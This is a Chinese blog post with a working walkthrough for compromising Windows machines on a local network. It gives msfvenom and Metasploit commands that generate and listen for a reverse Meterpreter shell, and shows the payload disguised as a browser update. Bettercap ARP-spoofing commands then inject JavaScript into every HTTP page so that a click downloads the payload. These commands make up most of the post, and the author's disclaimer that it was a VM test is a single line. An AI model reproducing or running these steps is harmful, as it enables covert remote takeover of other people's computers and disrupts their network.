kali系统:局域网arp欺骗, 搞定任意windows计算机
目的
通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机
准备
kali系统
metaspolit的使用
Arp欺骗工具:bettercap
博客园账号密码(用来上传小马文件)
metaspolit小马的准备
因为我本地的ip为151, 溢出后反弹的端口为444, 使用msfvenom生成名字为run1.exe的小马文件:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.151 LPORT= -f exe > run1.exe
文件是生成了,再把生成的小马文件和其它exe合并, 避免用户下载文件的时候起疑, 我使用exebind这个老工具:
把生成的exe文件放到服务器上, 我是把文件压缩以后, 放到博客园的个人空间上, 文件名字改为浏览器更新程序, 用户就会以为要更新文件, 然后去下载并打开这个文件
打开msf的控制台,开始监听本地的端口
use exploit/multi/handler
set lhost 192.168.1.151
set lport
set payload windows/meterpreter/reverse_tcp
exploit
bettercap执行Arp欺骗
bettercap参考官网, 此处省略1W字, 使用bettercap的添加html模块, 给所有的HTTP页面添加JS代码, 当用户点击body标签的时候 , 自动打开新窗口并下载一个exe文件, 命令行的参数最好添加-G指定网关, 添加-T添加攻击主机, 如果没有指定-T参数, 会欺骗局域网内部的所有设备, 欺骗越多, 别人越卡:
sudo bettercap -I wlan0 -X -T 192.168.1.150 -G 192.168.1.1 --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"
只要用户浏览器网页的时候, 下载了exe文件,并打开了该exe文件, 那么, 我们的kali机器会收到一个反弹的shell, 剩下的就是为所欲为了
欺骗全部计算机:
如果相对局域网内部的所有计算下手 ,bettercap的命令不用指定目标机器的IP, 如果被攻击的局域网流量比价高的情况下,这个局域网的网络会非常卡, 因为所有的流量都会走本地的kali机器, 测试代码如下:
sudo bettercap -I wlan0 -X -G 192.168.1.1 --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"
问题:
因为Arp欺骗的缘故, 导致被攻击的机器, 浏览网页的速度超级慢
如果用户浏览器网页的时候, 如果走的是Https协议的话 , 无法添加自定义代码到Html页面中
放在服务器上的小马文件, 最好要把http改成https, 否者, 用户下载文件的时候非常慢
本次渗透只是拿我的虚拟机进行个人测试,并没有搞破坏
在虚拟机的情况下, 直接外接usb无线网卡, 然后把网桥关闭, 避免bettercap的arp -a的时候出问题
需要攻击的时候,最好指定目标电脑的IP地址和局域网网关, 会更加保险, 确保能够攻击, 如果bettercap一条信息都没有嗅探到, 就要看看是不是哪里出问题了
如果要攻击一整个局域网的时候, 最好把需要攻击的电脑先ping通, 避免kali系统没找到路由表信息, 出现漏网之鱼
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司
kali系统:局域网arp欺骗, 搞定任意windows计算机的更多相关文章
- Kali实现局域网ARP欺骗和ARP攻击
原文地址: http://netsecurity.51cto.com/art/201303/386031.htm http://xiao106347.blog.163.com/blog/static/ ...
- 局域网 ARP 欺骗原理详解
局域网 ARP 欺骗原理详解 ARP 欺骗是一种以 ARP 地址解析协议为基础的一种网络攻击方式, 那么什么是 ARP 地址解析协议: 首先我们要知道, 一台电脑主机要把以太网数据帧发送到同一局域网的 ...
- unity3D 搞定任意ios插件
原地址:http://www.cnblogs.com/U-tansuo/archive/2012/11/22/unity_ios-plugin.html 说起unity调ios插件,好多淫比较头痛,探 ...
- 使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息
ARP欺骗的作用 当你在网吧玩,发现有人玩LOL大吵大闹, 用ARP欺骗把他踢下线吧 当你在咖啡厅看上某一个看书的妹纸,又不好意思开口要微信号, 用arp欺骗,不知不觉获取到她的微信号和聊天记录,吓一 ...
- kali Linux 渗透测试 | ARP 欺骗
目录 ARP 欺骗及其原理 ARP 欺骗实施步骤 必备工具安装 nmap 工具 dsniff 工具 driftnet 工具 ettercap 工具 ARP 欺骗测试 ARP 断网攻击 ARP 欺骗(不 ...
- kali 下使用 arpspoof 实现 ARP 欺骗
ARP 欺骗: 一种中间人攻击,攻击者通过毒化受害者的 ARP 缓存,将网关的 MAC 替换成攻击者的 MAC ,于是攻击者的主机实际上就充当了受害主机的网关, 之后攻击者就可以截获受害者发出和接到的 ...
- 华为海思搞定4K60fps!Vmate掌上云台相机国内首发
目录 Snoppa Vmate Snoppa Vmate Snoppa Vmate是一款掌上型的高性能4K摄像机,集成了微型机械三轴增稳云台,一体化机身集成可操控式触摸屏,既可以独立使用,也可以无线连 ...
- kali Linux 渗透测试 | ettercap图形界面(ARP 欺骗 + DNS欺骗)
上次我们使用 arpspoof 工具在命令行中完成了 arp 欺骗实验,今天我们用另一种工具 ettercap 工具来实现.ettercap支持图形化操作,对新手非常友好,并且操作非常简单, ette ...
- bat批处理文件搞定所有系统问题
bat批处理文件搞定所有系统问题 分类: WINDOWS -----------bat批处理文件搞定所有系统问题--------- 一.查漏补缺——给系统功能添把火 我们的操作系统虽然功 ...
随机推荐
- linux的文件权限与目录配置<----->第二章
1.Linux文件属性 [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] ...
- 一.CPU,Mem过高怎么办 --这是个开始
本身是名Java开发,在做了一段大数据的工作后,猛然间想对Java做个总结. 从未写过技术博客,一时不知如何开始,思虑后,暂且以自己喜爱的方式来开篇. 工作中遇到过CPU或内存过高的问题,解决步骤: ...
- .net core 项目文件结构浅析
1:launch.json (配置调试用的) 通过vs code创建的项目,都会有这个文件,是启动调试的配置文件: (vscode默认支持nodejs调试) 要调试调试c#代码 需要安装 C# 插件 ...
- 阿里云有对手了!CDN横评:腾讯云优势明显
如今,云计算产品越来越多,像国内的BAT三大巨头都提供了云主机(腾讯云CVM.阿里云ECS.百度云BCC),另外还有存储.数据库.安全等相关云服务.在这其中,CDN也是一项重要的云服务,CDN指的是内 ...
- ASP.NET前台table通过Ajax获取绑定后台查询的json数据
上一篇<ASP.NET前台html页面AJAX提交数据后台ashx页面接收数据>写了前台提交数据后台保存到数据库,数据处理以后用户肯定要查询.接下来就写一个前台table通过ajax J ...
- 虚拟机下克隆3个centos系统并配置IP访问网络(转载)
此文是保证linux系统能够上网 先查看本机的IP 打开虚拟机,更改虚拟机为桥接方式 在第一个虚拟机上打开终端,在命令行输入setup,选择NETWORK CONFIGRATION 回车后, 配置IP ...
- spring Bean类自动装载实现
先贴spring的开发文档,有助于大家学习http://shouce.jb51.net/spring/beans.html#beans-factory-class 一直想研究一下spring bean ...
- 无法远程连接服务器上的mysql
使用mysql管理工具连接服务器删过得mysql,显示连接被拒绝,但是在服务器上是可以登录mysql的. 无法远程连接通常以下几种情况: 首先,关闭mysql. service mysq ...
- noip冲刺赛第五次考试
1.公约数 (gcd.cpp\c\pas) [问题描述] 给定一个正整数,在[1,n]的范围内,求出有多少个无序数对(a,b)满足 gcd(a,b)=a xor b. [输入格式] 输入共一行,一个正 ...
- Javascript随笔2(JQuery)
1.jQuery 语法 Tips: 通过 CDN(内容分发网络)引用JQuery:(link的引用最好放在script的引用之前) <script src="http://apps.b ...